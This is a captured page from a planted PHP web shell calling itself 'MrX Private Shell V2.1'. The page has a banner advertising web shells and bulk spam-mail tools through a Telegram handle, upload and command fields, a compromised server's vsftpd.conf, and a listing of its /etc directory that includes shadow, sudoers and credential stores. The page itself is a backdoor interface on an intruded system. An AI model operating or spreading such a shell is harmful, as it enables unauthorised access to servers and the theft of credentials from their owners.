__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.
listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
#local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
#anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in  your  local  time  zone.  The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories.  See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty.  Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO

#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES

write_enable=YES
local_enable=YES
user_sub_token=$USER
local_root=/home/$USER/ftp
chroot_local_user=YES
allow_writeable_chroot=YES
pasv_enable=YES
pasv_min_port=40000
pasv_max_port=50000
userlist_enable=YES
userlist_file=/etc/vsftpd.userlist
userlist_deny=NO

Filemanager

Name Type Size Permission Actions
ModemManager Folder 0755
NetworkManager Folder 0755
PackageKit Folder 0755
UPower Folder 0755
X11 Folder 0755
alsa Folder 0755
alternatives Folder 0755
apache2 Folder 0755
apm Folder 0755
apparmor Folder 0755
apparmor.d Folder 0755
apport Folder 0755
apt Folder 0755
avahi Folder 0755
bash_completion.d Folder 0755
binfmt.d Folder 0755
bluetooth Folder 0755
brltty Folder 0755
ca-certificates Folder 0755
chatscripts Folder 2750
cloud Folder 0755
colord Folder 0755
console-setup Folder 0755
cracklib Folder 0755
credstore Folder 0700
credstore.encrypted Folder 0700
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cron.yearly Folder 0755
cups Folder 0755
cupshelpers Folder 0755
dbconfig-common Folder 0755
dbus-1 Folder 0755
dconf Folder 0755
debuginfod Folder 0755
default Folder 0755
depmod.d Folder 0755
dhcp Folder 0755
dictionaries-common Folder 0755
dpkg Folder 0755
emacs Folder 0755
environment.d Folder 0755
fonts Folder 0755
fwupd Folder 0755
gdb Folder 0755
gdm3 Folder 0755
geoclue Folder 0755
ghostscript Folder 0755
glvnd Folder 0755
gnome Folder 0755
gnome-remote-desktop Folder 0755
gnutls Folder 0755
groff Folder 0755
grub.d Folder 0755
gss Folder 0755
gtk-2.0 Folder 0755
gtk-3.0 Folder 0755
hp Folder 0755
ifplugd Folder 0755
init Folder 0755
init.d Folder 0755
initramfs-tools Folder 0755
insserv.conf.d Folder 0755
ipp-usb Folder 0755
kdump Folder 0755
kernel Folder 0755
krb5.conf.d Folder 0755
ld.so.conf.d Folder 0755
ldap Folder 0755
libblockdev Folder 0755
libibverbs.d Folder 0755
libnl-3 Folder 0755
libreoffice Folder 0755
lighttpd Folder 0755
logcheck Folder 0755
logrotate.d Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
mysql Folder 0755
needrestart Folder 0755
netplan Folder 0755
network Folder 0755
networkd-dispatcher Folder 0755
newt Folder 0755
openvpn Folder 0755
opt Folder 0755
pam.d Folder 0755
pcmcia Folder 0755
perl Folder 0755
php Folder 0755
phpmyadmin Folder 0755
pki Folder 0755
plymouth Folder 0755
pm Folder 0755
polkit-1 Folder 0755
ppp Folder 0755
profile.d Folder 0755
pulse Folder 0755
python3 Folder 0755
python3.13 Folder 0755
rc0.d Folder 0755
rc1.d Folder 0755
rc2.d Folder 0755
rc3.d Folder 0755
rc4.d Folder 0755
rc5.d Folder 0755
rc6.d Folder 0755
rcS.d Folder 0755
rsyslog.d Folder 0755
sane.d Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
sgml Folder 0755
skel Folder 0755
snmp Folder 0755
speech-dispatcher Folder 0755
ssh Folder 0755
ssl Folder 0755
sssd Folder 0711
sudoers.d Folder 0755
supercat Folder 0755
sysctl.d Folder 0755
sysstat Folder 0755
systemd Folder 0755
terminfo Folder 0755
thermald Folder 0755
tmpfiles.d Folder 0755
ubuntu-advantage Folder 0755
udev Folder 0755
udisks2 Folder 0755
ufw Folder 0755
update-manager Folder 0755
update-motd.d Folder 0755
update-notifier Folder 0755
usb_modeswitch.d Folder 0755
vim Folder 0755
vulkan Folder 0755
wpa_supplicant Folder 0755
xdg Folder 0755
xml Folder 0755
.pwd.lock File 0 B 0600
.resolv.conf.systemd-resolved.bak File 862 B 0644
.updated File 0 B 0644
adduser.conf File 3.36 KB 0644
anacrontab File 394 B 0644
apg.conf File 433 B 0644
bash.bashrc File 2.27 KB 0644
bash_completion File 45 B 0644
bindresvport.blacklist File 367 B 0644
brlapi.key File 33 B 0640
brltty.conf File 30.04 KB 0644
ca-certificates.conf File 6.36 KB 0644
crontab File 1.11 KB 0644
debconf.conf File 2.9 KB 0644
debian_version File 11 B 0644
deluser.conf File 1.67 KB 0644
dhcpcd.conf File 1.39 KB 0644
e2scrub.conf File 685 B 0644
environment File 106 B 0644
ethertypes File 1.81 KB 0644
fprintd.conf File 20 B 0644
fstab File 585 B 0644
ftpusers File 132 B 0644
fuse.conf File 694 B 0644
gai.conf File 2.52 KB 0644
gprofng.rc File 3.89 KB 0644
group File 1.69 KB 0644
group- File 1.68 KB 0644
gshadow File 1.49 KB 0640
gshadow- File 1.48 KB 0640
hdparm.conf File 4.34 KB 0644
host.conf File 92 B 0644
hostname File 29 B 0644
hosts File 243 B 0644
hosts.allow File 411 B 0644
hosts.deny File 711 B 0644
inputrc File 1.83 KB 0644
issue File 20 B 0644
issue.net File 13 B 0644
ld.so.cache File 71.91 KB 0644
ld.so.conf File 34 B 0644
legal File 267 B 0644
libao.conf File 27 B 0644
libaudit.conf File 191 B 0644
locale.alias File 2.93 KB 0644
locale.conf File 17 B 0644
locale.gen File 9.39 KB 0644
localtime File 232 B 0644
login.defs File 5.8 KB 0644
logrotate.conf File 586 B 0644
lsb-release File 99 B 0644
machine-id File 33 B 0444
magic File 111 B 0644
magic.mime File 111 B 0644
manpath.config File 5.11 KB 0644
mecabrc File 288 B 0644
mime.types File 76.45 KB 0644
mke2fs.conf File 775 B 0644
modules File 212 B 0644
mtab File 0 B 0444
nanorc File 11.48 KB 0644
netconfig File 767 B 0644
networks File 91 B 0644
nftables.conf File 243 B 0755
nsswitch.conf File 594 B 0644
os-release File 391 B 0644
pam.conf File 552 B 0644
paperspecs File 1.28 KB 0644
passwd File 3.97 KB 0644
passwd- File 3.94 KB 0644
pnm2ppa.conf File 7.47 KB 0644
printcap File 1.03 KB 0644
profile File 641 B 0644
protocols File 3.07 KB 0644
resolv.conf File 936 B 0644
rmt File 62.76 KB 0755
rpc File 911 B 0644
rsyslog.conf File 1.18 KB 0644
rygel.conf File 5.64 KB 0644
sensors3.conf File 10.34 KB 0644
services File 12.51 KB 0644
shadow File 2.16 KB 0640
shadow- File 2.09 KB 0640
shells File 118 B 0644
subgid File 117 B 0644
subgid- File 93 B 0644
subuid File 117 B 0644
subuid- File 93 B 0644
sudo.conf File 4.24 KB 0644
sudo_logsrvd.conf File 9.57 KB 0644
sudoers File 1.76 KB 0440
timezone File 15 B 0644
ucf.conf File 1.23 KB 0644
usb_modeswitch.conf File 1.49 KB 0644
vconsole.conf File 153 B 0644
vdpau_wrapper.cfg File 51 B 0644
vsftpd.conf File 5.97 KB 0644
vsftpd.userlist File 10 B 0644
vtrgb File 158 B 0644
wgetrc File 4.83 KB 0644
whoopsie File 30 B 0644
xattr.conf File 681 B 0644
zsh_command_not_found File 460 B 0644
Filemanager